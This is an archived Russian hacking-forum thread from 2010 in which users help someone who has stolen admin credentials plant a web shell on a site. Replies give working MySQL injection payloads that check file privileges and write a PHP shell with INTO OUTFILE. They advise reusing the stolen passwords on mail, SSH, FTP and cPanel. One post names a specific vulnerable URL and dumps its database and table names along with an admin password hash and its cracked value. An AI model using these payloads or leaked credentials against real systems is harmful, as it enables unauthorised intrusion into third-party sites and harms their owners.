ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.10.2010, 03:57
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от GroM88
GroM88 said:
мб как то можно залить шел с помощью sql запроса?
для этого ты должен иметь права на запись и знать локальный путь до сайта.
чтобы узнать есть ли права, используй запрос
UNION SELECT File_Priv from mysql.user
если в ответ получишь Y, то права есть.
чтобы найти путь, попытайся вывести какую-нибудь ошибку, например через тот же sql запрос. или просмотри базу на наличие каких-нибудь конфигов. в них может быть указан путь.
если права будут (в чём я сомневаюсь), и узнаешь путь, используй след. запрос для залития шелла:
UNION SELECT 'шелл' from mysql.user into outfile 'путь_до_сайта/shell.php'
|
|
|
06.10.2010, 06:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от GroM88
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
кроме совета d1v попробуй эти логины пароли к mail/pma/ssh/ftp/cpanel/etc...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
06.10.2010, 07:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от pinch
pinch said:
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....
БД
Сообщение от None
master
tempdb
model
msdb
telecom
zaokolmi
zags
р–master
Таблы с БД zaokolmi
Сообщение от None
dtproperties
foto_catalog
auto_catalog
admin
pwd name
009091b3166dcbe1aa6202a97bcda08a zao
пароль от хеша 123456 вроде
Сайты на сервере(ReverseIP): больше 50
кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
06.10.2010, 09:26
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
shell_code плиииз запросы в личку
|
|
|
|
06.10.2010, 18:48
|
|
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049
Репутация:
0
|
|
Сообщение от GroM88
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
site?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.
и да Требуются привилегии FILE
|
|
|
|
06.10.2010, 19:35
|
|
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485
Репутация:
13
|
|
Сообщение от GroM88
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
|
|
|
|
06.10.2010, 20:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
а d1v что написал то ? =\
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
07.10.2010, 02:42
|
|
Новичок
Регистрация: 03.12.2006
Сообщений: 24
Провел на форуме:
177837
Репутация:
7
|
|
Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.
|
|
|
|
07.10.2010, 03:07
|
|
Новичок
Регистрация: 19.01.2007
Сообщений: 1
Провел на форуме:
156305
Репутация:
5
|
|
Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).
|
|
|
|
07.10.2010, 10:51
|
|
Новичок
Регистрация: 23.08.2009
Сообщений: 1
Провел на форуме:
21192
Репутация:
0
|
|
Ужасно глупый вопрос.
Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?
В моем браузере отключены скритпы.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
